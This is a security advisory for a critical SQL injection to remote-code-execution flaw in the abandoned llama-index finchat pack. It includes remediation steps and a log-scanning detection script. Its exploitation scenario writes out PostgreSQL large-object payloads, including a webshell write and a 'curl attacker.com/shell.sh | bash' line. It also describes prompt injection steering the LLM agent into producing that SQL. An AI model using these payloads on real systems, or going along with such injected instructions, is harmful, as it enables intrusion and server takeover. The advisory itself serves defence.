CVE-2024-12909: llama-index finchat: SQL injection enables RCE

GHSA-x48g-hm9c-ww42 CRITICAL
Published March 20, 2025
CISO Take

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Sources: NVD, EPSS, GitHub Advisory, CISA KEV, ATLAS

Risk Assessment

Severity is maximum (CVSS 10.0) with the most dangerous attack profile possible: network-accessible, low complexity, no privileges required, no user interaction, full CIA impact with scope change. The lack of any patch and the package's abandonment mean this vulnerability will never be remediated upstream. While EPSS (0.694%) reflects relatively low current active exploitation, the trivial exploitability of SQL injection combined with the PostgreSQL large object RCE path — a well-documented technique (e.g., CVE-2019-9193 precedent) — means exploitation requires minimal attacker sophistication. Organizations running AI financial analysis agents backed by PostgreSQL face the highest exposure.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| llama-index-packs-finchat | pip | <= 0.3.0 | No patch |

48.3K · 227 dependents · Pushed 3d ago · 87% patched · ~50d to patch

Do you use llama-index-packs-finchat? You're affected.

Severity & Risk

CVSS 3.1: 10.0 / 10
EPSS: 0.7% chance of exploitation in 30 days (higher than 72% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

Recommended Action

  1. **Remove immediately**: Uninstall `llama-index-packs-finchat` — no patch exists and none will be issued. Pin your `llama-index` packs to avoid automatic reinstallation.
  2. **Audit dependent packages**: Run `pip show llama-index-packs-finchat` and audit `requirements.txt`/`pyproject.toml` across all AI services.
  3. **PostgreSQL hardening**: Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no membership in the `pg_execute_server_program` role. Disable `COPY TO PROGRAM` for application roles.
  4. **Detection**: Monitor PostgreSQL logs for `lo_create`, `lo_import`, `lo_export`, `COPY TO PROGRAM`, and `pg_largeobject` table access patterns from application service accounts.
  5. **Replacement**: Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.
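One way to implement the detection step above, as an added example (not code from the advisory or from the LlamaIndex project). It assumes `log_statement = 'all'`, a `log_line_prefix` of `'%m [%p] %u@%d '`, and a hypothetical service role named `finchat_app`; the log lines are constructed.

```python
import re

APP_ROLES = {"finchat_app"}  # assumed service-account name used by the LLM agent

# Assumes log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d '.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+(?:statement|execute [^:]*): (?P<sql>.*)$"
)

# Indicators from the detection step above (lo_creat is the older spelling).
INDICATORS = {
    "large_object_fn": re.compile(r"\blo_(?:create?|import|export)\s*\(", re.I),
    "pg_largeobject": re.compile(r"\bpg_largeobject\b", re.I),
    "copy_to_program": re.compile(r"\bcopy\b.*?\bto\s+program\b", re.I | re.S),
}

SAMPLE_LOG = (  # constructed log lines, not captured from a real system
    "2025-03-21 10:15:01.101 UTC [4121] finchat_app@finance LOG:  statement: SELECT close FROM prices WHERE ticker = 'ACME'\n"
    "2025-03-21 10:15:02.202 UTC [4121] finchat_app@finance LOG:  statement: SELECT lo_import('/tmp/constructed-sample.txt')\n"
    "2025-03-21 10:15:03.303 UTC [977] dba_admin@finance LOG:  statement: SELECT lo_export(16384, '/tmp/constructed-backup')\n"
    "2025-03-21 10:15:04.404 UTC [4121] finchat_app@finance LOG:  statement: COPY (SELECT 1)\n"
    "\tTO PROGRAM 'placeholder-command'\n"
    "2025-03-21 10:15:05.505 UTC [4121] finchat_app@finance LOG:  execute <unnamed>: SELECT count(*) FROM pg_largeobject\n"
)

def parse_statements(log_text):
    """Yield one dict per logged statement; tab-indented lines continue the previous one."""
    current = None
    for line in log_text.splitlines():
        if line.startswith("\t") and current:
            current["sql"] += "\n" + line.strip()
            continue
        if current:
            yield current
        m = LINE_RE.match(line)
        current = m.groupdict() if m else None
    if current:
        yield current

def find_alerts(log_text, app_roles=APP_ROLES):
    alerts = []
    for stmt in parse_statements(log_text):
        if stmt["user"] not in app_roles:
            continue  # only application service accounts are in scope here
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(stmt["sql"]))
        if hits:
            alerts.append((stmt["ts"], stmt["user"], hits))
    return alerts
```

`find_alerts(SAMPLE_LOG)` returns three alerts for `finchat_app`; the `dba_admin` statement is skipped because that role is not in `APP_ROLES`.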

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2.6 - AI system security
NIST AI RMF: MS-2.5 - AI Risk Measurement and Monitoring
OWASP LLM Top 10: LLM07:2025 - Insecure Plugin Design

Technical Details

NVD Description

A vulnerability in the FinanceChatLlamaPack of the llama-index-packs-finchat package, versions up to v0.3.0, allows for SQL injection in the `run_sql_query` function of the `database_agent`. This vulnerability can be exploited by an attacker to inject arbitrary SQL queries, leading to remote code execution (RCE) through the use of PostgreSQL's large object functionality. The issue is resolved by no longer officially supporting the package and moving it into the `stale_packages` branch on the repo, thus removing it from documentation etc.

Exploitation Scenario

An attacker targeting an AI financial analysis application built on LlamaIndex sends a crafted natural-language query (or, in an agentic pipeline, injects a malicious instruction via prompt injection). The LLM generates and passes a SQL string containing a PostgreSQL large object payload to `run_sql_query`. Example payload: `'; SELECT lo_import('/etc/passwd'); SELECT lo_export(16384, '/var/www/html/shell.php'); --`. If the PostgreSQL user has sufficient privileges, this writes a webshell to the server filesystem. Alternatively, if the role has `SUPERUSER`, the attacker uses `COPY (SELECT 'payload') TO PROGRAM 'curl attacker.com/shell.sh | bash'` to achieve direct OS command execution. The entire attack chain is unauthenticated and requires no prior knowledge of the schema.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published: March 20, 2025
Last Modified: April 3, 2025
First Seen: March 24, 2026

Related Vulnerabilities